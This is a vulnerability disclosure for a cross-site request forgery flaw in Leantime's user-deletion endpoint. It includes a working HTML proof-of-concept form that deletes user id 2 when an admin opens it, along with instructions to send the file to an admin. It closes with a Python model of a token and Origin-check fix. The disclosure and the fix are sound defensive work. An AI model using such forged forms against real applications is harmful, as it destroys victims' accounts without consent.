Cross-Site Request Forgery (CSRF) in leantime/leantime
Aug 17th 2021
CSRF when deleting a user: the delete endpoint has no anti-CSRF token or other CSRF protection.
Proof of Concept
Create an .html file (poc.html, for example) and paste the following code into it. Change localhost to your domain or IP address.
<html>
<head>
  <title>CSRF PoC</title>
</head>
<body>
  <!-- Cross-site form aimed at the unprotected delete endpoint; the user id (2) is hard-coded in the action URL -->
  <form action="http://localhost/users/delUser/2" method="POST">
    <!-- the confirmation field the delete handler expects, as submitted by the real form -->
    <input type="text" name="del" value="Yes%252C+delete%2521" /><br />
    <input type="submit" value="Go!" />
  </form>
</body>
</html>
Send this file to an admin. When he opens the file, the user with id 2 is deleted instantly. See the screenshot, where there are still two users.
[Screenshot: the admin decides to click Go on the PoC page]
After clicking Go, the next screen shows that the user with id 2 (test) no longer exists.
This vulnerability allows an attacker to delete a user account. If the admin is sent the link and clicks on it, the user is deleted instantly because there is no CSRF protection.
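As an added example (not code from the Leantime project or from this report), the check that is missing here, modelled in Python: a per-session synchronizer token compared in constant time, plus an Origin/Referer check, in front of the delete handler. The names issue_csrf_token, handle_del_user and the users dict are assumptions for the model.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed model of the report's endpoint (POST /users/delUser/<id>) with the
# missing protection added: a per-session synchronizer token plus an Origin check.
# Function names and the users dict are assumptions, not Leantime's own code.

def issue_csrf_token(session: dict) -> str:
    """Create (or reuse) the session's random token; embed it in every state-changing form."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]

def same_origin(headers: dict, site_origin: str) -> bool:
    """Defence in depth: browsers send Origin (or Referer) on cross-site form POSTs."""
    sent = headers.get("Origin") or headers.get("Referer")
    if not sent:
        return False
    a, b = urlsplit(sent), urlsplit(site_origin)
    return (a.scheme, a.netloc) == (b.scheme, b.netloc)

def csrf_request_allowed(session: dict, form: dict, headers: dict, site_origin: str) -> bool:
    """True only if the POST carries the session's token (compared in constant time)
    and originates from our own site; the PoC form above satisfies neither condition."""
    expected, supplied = session.get("csrf_token"), form.get("csrf_token")
    if not expected or not isinstance(supplied, str):
        return False
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False
    return same_origin(headers, site_origin)

def handle_del_user(users: dict, user_id: int, session: dict, form: dict,
                    headers: dict, site_origin: str = "http://localhost") -> bool:
    """Hardened delete handler: returns True only when the user was actually removed."""
    if not csrf_request_allowed(session, form, headers, site_origin):
        return False  # forged request: no state change
    if "del" not in form or user_id not in users:
        return False
    del users[user_id]
    return True
```

With this in place the PoC form fails both checks (no token, foreign Origin), while the application's own form, rendered with the session token, still works.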